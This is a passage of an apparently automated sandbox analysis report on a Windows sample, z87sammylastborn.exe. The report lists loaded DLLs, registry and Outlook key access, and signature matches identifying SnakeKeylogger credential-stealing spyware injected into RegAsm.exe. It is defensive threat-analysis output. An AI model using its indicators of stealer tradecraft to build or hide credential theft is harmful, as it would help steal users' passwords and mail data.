                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D9E183_2_050D9E18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DF6203_2_050DF620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DF6303_2_050DF630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DD6823_2_050DD682
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DD6903_2_050DD690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DA6B93_2_050DA6B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DA6C83_2_050DA6C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DE91E3_2_050DE91E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DE9283_2_050DE928
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DC97A3_2_050DC97A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D118F3_2_050D118F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DC9883_2_050DC988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D11A03_2_050D11A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DF1C83_2_050DF1C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DF1D83_2_050DF1D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D00063_2_050D0006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DB8183_2_050DB818
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DB8283_2_050DB828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D00403_2_050D0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DE0683_2_050DE068
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DE0783_2_050DE078
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D40983_2_050D4098
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D40A83_2_050D40A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DC0CA3_2_050DC0CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D08DF3_2_050D08DF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DC0D83_2_050DC0D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D08F03_2_050D08F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DAB103_2_050DAB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DAB203_2_050DAB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D33923_2_050D3392
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D33A03_2_050D33A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DB3C13_2_050DB3C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DB3D03_2_050DB3D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DD22A3_2_050DD22A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DD2383_2_050DD238
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DA2613_2_050DA261
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DFA783_2_050DFA78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DA2703_2_050DA270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DFA883_2_050DFA88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D2AE03_2_050D2AE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D2AF03_2_050D2AF0
                Source: z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVebinace.dll2 vs z87sammylastborn.exe
                Source: z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs z87sammylastborn.exe
                Source: z87sammylastborn.exe, 00000000.00000002.2084385512.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePoses.dll, vs z87sammylastborn.exe
                Source: z87sammylastborn.exe, 00000000.00000002.2084385512.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs z87sammylastborn.exe
                Source: z87sammylastborn.exe, 00000000.00000000.2074618731.0000000000602000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNone.exe* vs z87sammylastborn.exe
                Source: z87sammylastborn.exe, 00000000.00000002.2084385512.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePoses.dll, vs z87sammylastborn.exe
                Source: z87sammylastborn.exe, 00000000.00000002.2082290004.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs z87sammylastborn.exe
                Source: z87sammylastborn.exeBinary or memory string: OriginalFilenameNone.exe* vs z87sammylastborn.exe
                Source: z87sammylastborn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                Source: C:\Users\user\Desktop\z87sammylastborn.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z87sammylastborn.exe.logJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                Source: z87sammylastborn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: z87sammylastborn.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\z87sammylastborn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegAsm.exe, 00000003.00000002.4534915340.0000000003B1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: z87sammylastborn.exeVirustotal: Detection: 50%
                Source: z87sammylastborn.exeReversingLabs: Detection: 76%
                Source: unknownProcess created: C:\Users\user\Desktop\z87sammylastborn.exe "C:\Users\user\Desktop\z87sammylastborn.exe"
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: z87sammylastborn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: z87sammylastborn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: G:\IMPORTANT SRC\GOOD Nova\Crypter\Stubs Fully\Public\Public Runpe\PR\PR\obj\Debug\Poses.pdb source: z87sammylastborn.exe, 00000000.00000002.2084385512.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp
                Source: z87sammylastborn.exeStatic PE information: 0x827F415A [Thu May 19 00:31:22 2039 UTC]
                Source: C:\Users\user\Desktop\z87sammylastborn.exeCode function: 0_2_00CA0014 pushad ; iretd 0_2_00CA0015
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A438B0 push eax; ret 3_2_02A438EA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A43880 push eax; ret 3_2_02A438FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A43880 push eax; ret 3_2_02A4390A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A438F0 push eax; ret 3_2_02A438FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A43900 push eax; ret 3_2_02A4390A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A43910 push eax; ret 3_2_02A4391A
                Source: z87sammylastborn.exeStatic PE information: section name: .text entropy: 7.7536199191262964
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
